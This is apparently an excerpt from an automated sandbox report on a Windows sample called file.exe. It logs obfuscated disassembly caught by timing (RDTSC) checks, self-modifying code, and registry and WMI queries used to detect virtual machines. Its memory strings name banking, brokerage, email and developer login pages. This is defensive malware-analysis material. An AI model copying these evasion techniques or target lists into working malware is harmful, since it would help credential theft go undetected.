              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49804F4 second address: 4980591 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBBF0522A61h 0x00000009 and al, FFFFFFF6h 0x0000000c jmp 00007FBBF0522A61h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FBBF0522A60h 0x00000018 xor ecx, 251A3418h 0x0000001e jmp 00007FBBF0522A5Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, edi 0x00000028 jmp 00007FBBF0522A66h 0x0000002d push eax 0x0000002e jmp 00007FBBF0522A5Bh 0x00000033 xchg eax, edi 0x00000034 pushad 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FBBF0522A62h 0x0000003c and eax, 0DADB8D8h 0x00000042 jmp 00007FBBF0522A5Bh 0x00000047 popfd 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49805B6 second address: 49805BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49805BC second address: 49805C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49805C2 second address: 49805C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49805C6 second address: 498064E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d jmp 00007FBBF0522A61h 0x00000012 sub edi, edi 0x00000014 jmp 00007FBBF0522A67h 0x00000019 inc ebx 0x0000001a jmp 00007FBBF0522A66h 0x0000001f test al, al 0x00000021 jmp 00007FBBF0522A60h 0x00000026 je 00007FBBF0522CE7h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FBBF0522A67h 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498064E second address: 4980654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980654 second address: 4980658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980658 second address: 498066B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ecx, dword ptr [ebp-14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov bl, ah 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498066B second address: 49806BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBBF0522A5Eh 0x00000009 adc esi, 32582648h 0x0000000f jmp 00007FBBF0522A5Bh 0x00000014 popfd 0x00000015 call 00007FBBF0522A68h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [ebp-14h], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FBBF0522A5Ch 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49806BC second address: 49806C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49806C2 second address: 49806C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49806FC second address: 498074E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBBF10EEFA2h 0x00000008 adc si, 9098h 0x0000000d jmp 00007FBBF10EEF9Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 pushad 0x00000018 mov ecx, 3F3CB86Bh 0x0000001d mov dx, si 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 call 00007FBBF10EEFA6h 0x0000002a pop esi 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498074E second address: 4980754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980754 second address: 4980758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49807ED second address: 498083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test eax, eax 0x00000009 jmp 00007FBBF0522A64h 0x0000000e jg 00007FBC616006D8h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FBBF0522A5Dh 0x0000001d sbb ax, 47C6h 0x00000022 jmp 00007FBBF0522A61h 0x00000027 popfd 0x00000028 mov esi, 7558EC77h 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498083E second address: 498087F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEF9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FBBF10EF007h 0x0000000f jmp 00007FBBF10EEF9Eh 0x00000014 cmp dword ptr [ebp-14h], edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FBBF10EEFA7h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498087F second address: 49808B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 086Ah 0x00000007 jmp 00007FBBF0522A5Bh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007FBC6160065Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBBF0522A65h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49808B1 second address: 49808E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 mov bx, 05CCh 0x00000014 popad 0x00000015 lea eax, dword ptr [ebp-2Ch] 0x00000018 jmp 00007FBBF10EEF9Bh 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49808E6 second address: 49808EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 0C94h 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49808EF second address: 498094B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEF9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov bh, C2h 0x0000000d call 00007FBBF10EEF9Ah 0x00000012 mov esi, 121B1AE1h 0x00000017 pop eax 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b call 00007FBBF10EEFA3h 0x00000020 mov dx, ax 0x00000023 pop esi 0x00000024 mov di, 0EA8h 0x00000028 popad 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FBBF10EEFA6h 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498094B second address: 498095A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498095A second address: 49809A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FBBF10EEF9Eh 0x00000011 xchg eax, ebx 0x00000012 jmp 00007FBBF10EEFA0h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49809A0 second address: 49809A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49809A4 second address: 49809A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49809A8 second address: 49809AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980010 second address: 4980049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEF9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBBF10EEFA6h 0x0000000f push eax 0x00000010 jmp 00007FBBF10EEF9Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980049 second address: 498004D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498004D second address: 4980051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980051 second address: 4980057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980057 second address: 498008A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 34h 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FBBF10EEF9Ch 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBBF10EEFA7h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498008A second address: 4980100 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FBBF0522A61h 0x0000000f xchg eax, ecx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FBBF0522A5Ch 0x00000017 jmp 00007FBBF0522A65h 0x0000001c popfd 0x0000001d mov ah, C7h 0x0000001f popad 0x00000020 mov dword ptr [ebp-04h], 55534552h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov cl, 3Fh 0x0000002c call 00007FBBF0522A61h 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980D90 second address: 4980D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980D96 second address: 4980D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4980D9A second address: 4980D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990008 second address: 499000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499000C second address: 4990010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990010 second address: 4990016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990016 second address: 4990033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF10EEFA9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990033 second address: 49900E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007FBBF0522A59h 0x00000010 pushad 0x00000011 jmp 00007FBBF0522A5Ch 0x00000016 pushad 0x00000017 call 00007FBBF0522A60h 0x0000001c pop ecx 0x0000001d movsx ebx, ax 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FBBF0522A5Dh 0x00000028 mov eax, dword ptr [esp+04h] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FBBF0522A67h 0x00000033 xor si, 1B5Eh 0x00000038 jmp 00007FBBF0522A69h 0x0000003d popfd 0x0000003e mov edx, ecx 0x00000040 popad 0x00000041 mov eax, dword ptr [eax] 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FBBF0522A68h 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49900E0 second address: 499010E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEF9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007FBBF10EEF9Fh 0x00000013 mov bx, si 0x00000016 popad 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499010E second address: 4990114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990114 second address: 499015F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FBC621B49DAh 0x0000000e push 75A52B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [75AB4538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 jmp 00007FBBF10EEFA0h 0x00000058 sub esi, esi 0x0000005a jmp 00007FBBF10EEFA1h 0x0000005f mov dword ptr [ebp-1Ch], esi 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499015F second address: 4990165 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990165 second address: 499016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499016B second address: 499016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499016F second address: 4990173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A06CF second address: 49A0726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBBF0522A5Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ax, 0953h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov ebx, 2F4BA666h 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FBBF0522A68h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0726 second address: 49A072C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A072C second address: 49A0746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0746 second address: 49A074C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A074C second address: 49A076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBBF0522A5Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov esi, 49CA44F3h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A076D second address: 49A0772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0772 second address: 49A083A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBF0522A65h 0x00000008 mov esi, 7C4DD037h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 jmp 00007FBBF0522A5Ah 0x00000016 mov esi, dword ptr [ebp+0Ch] 0x00000019 jmp 00007FBBF0522A60h 0x0000001e test esi, esi 0x00000020 jmp 00007FBBF0522A60h 0x00000025 je 00007FBC615D064Bh 0x0000002b pushad 0x0000002c mov ax, di 0x0000002f popad 0x00000030 cmp dword ptr [75AB459Ch], 05h 0x00000037 pushad 0x00000038 call 00007FBBF0522A65h 0x0000003d mov cx, E0E7h 0x00000041 pop ecx 0x00000042 pushfd 0x00000043 jmp 00007FBBF0522A5Dh 0x00000048 or si, CD56h 0x0000004d jmp 00007FBBF0522A61h 0x00000052 popfd 0x00000053 popad 0x00000054 je 00007FBC615E86D8h 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d pushfd 0x0000005e jmp 00007FBBF0522A5Ah 0x00000063 xor ax, 9F78h 0x00000068 jmp 00007FBBF0522A5Bh 0x0000006d popfd 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A083A second address: 49A086E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FBBF10EEFA4h 0x0000000c add eax, 22C439D8h 0x00000012 jmp 00007FBBF10EEF9Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d mov edx, eax 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A08E7 second address: 49A0929 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBBF0522A62h 0x00000008 add esi, 0FD58358h 0x0000000e jmp 00007FBBF0522A5Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBBF0522A65h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0929 second address: 49A0963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBBF10EEF9Ah 0x00000013 or ecx, 4BEA4818h 0x00000019 jmp 00007FBBF10EEF9Bh 0x0000001e popfd 0x0000001f movzx eax, bx 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0963 second address: 49A0969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0969 second address: 49A096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A096D second address: 49A0971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0971 second address: 49A098B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBBF10EEF9Fh 0x00000010 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4CE9A4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4CEA29 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6740B7 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 69AC99 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 67B768 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4CE96E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6FC95D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 1468Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 1468Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, file.exe, 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: file.exe, 00000001.00000002.1447480635.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1447480635.0000000000B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: file.exe, 00000001.00000003.1335719740.000000000536A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: file.exe, 00000001.00000003.1336079000.000000000535C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
